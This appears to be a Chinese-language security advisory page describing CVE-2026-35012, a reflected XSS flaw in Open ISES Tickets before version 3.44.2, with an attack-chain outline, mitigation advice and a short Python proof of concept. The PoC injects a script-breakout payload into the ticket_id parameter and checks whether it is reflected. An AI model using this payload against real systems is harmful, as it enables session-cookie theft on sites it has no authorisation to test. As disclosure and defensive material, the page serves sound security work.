CVE-2026-35012 CVSS 4.6 中危

CVE-2026-35012 Open ISES Tickets反射型XSS漏洞

披露日期: 2026-05-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35012

漏洞类型

跨站脚本攻击 (XSS)

CVSS评分

4.6 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Open ISES Tickets

漏洞概述

Open ISES Tickets 在 3.44.2 版本之前的版本中存在一个反射型跨站脚本（XSS）漏洞。该漏洞源于 add_facnote.php 文件未能正确过滤用户输入。攻击者可以通过 ticket_id GET 参数传递恶意 JavaScript 代码，并将其直接插入到隐藏输入字段的 VALUE 属性中。一旦经过身份验证的用户访问了攻击者精心构造的恶意链接，嵌入的脚本将在受害者的浏览器中执行，可能导致窃取会话令牌或其他敏感信息。

技术细节

该漏洞的核心问题在于 Open ISES Tickets 的 add_facnote.php 页面对 GET 参数 ticket_id 的处理缺乏安全性。开发者直接将用户可控的参数值嵌入到 HTML 隐藏输入域的 VALUE 属性中，且未进行任何 HTML 实体编码（如将 " 转义为 "）。攻击者可以构造包含 ">" 的 payload 闭合原本的属性标签，进而插入恶意的 HTML 标签或 JavaScript 事件处理程序（例如 onfocus、onmouseover）。由于攻击发生在客户端，且需要受害者访问特定链接（用户交互），攻击者通常结合社会工程学手段诱导已登录的管理员或用户点击链接。一旦触发，恶意脚本将在受害者的浏览器上下文中运行，从而窃取 Session Cookie 或执行未授权操作。

攻击链分析

STEP 1

侦察

攻击者确认目标使用的是 Open ISES Tickets 3.44.2 之前的版本。

STEP 2

武器化

攻击者构造包含恶意 JavaScript 代码的 URL，利用 ticket_id 参数将 payload 注入到隐藏输入框的 value 属性中。

STEP 3

投递

攻击者通过钓鱼邮件或即时通讯工具将恶意链接发送给具有系统访问权限的受害者。

STEP 4

利用

受害者点击链接并访问 add_facnote.php 页面，浏览器解析 HTML 并执行注入的恶意脚本。

STEP 5

达成目标

恶意脚本在受害者浏览器中运行，窃取 Session Cookie 或执行权限内的操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable endpoint
target_url = "http://target.com/add_facnote.php"

# Malicious payload designed to break out of the hidden input value attribute
# The payload attempts to close the input tag and inject a script tag
payload = '"><script>alert(\'XSS\');</script>'

# Construct the full malicious URL
params = {"ticket_id": payload}

try:
    # Send the GET request
    response = requests.get(target_url, params=params, timeout=10)

    # Check if the payload is reflected in the response (basic verification)
    if "alert('XSS')" in response.text:
        print("[+] Potential Vulnerability Detected: Payload reflected in response.")
        print(f"[+] Request URL: {response.url}")
    else:
        print("[-] Payload not reflected or vulnerability not exploitable.")

except requests.exceptions.RequestException as e:
    print(f"Error connecting to target: {e}")

影响范围

Open ISES Tickets < 3.44.2

防御指南

临时缓解措施

建议管理员立即检查系统版本，若低于 3.44.2，请务必升级。在无法立即升级的情况下，应在 Web 应用防火墙（WAF）层面部署规则，拦截针对 ticket_id 参数的特殊字符注入，并限制对 add_facnote.php 的访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表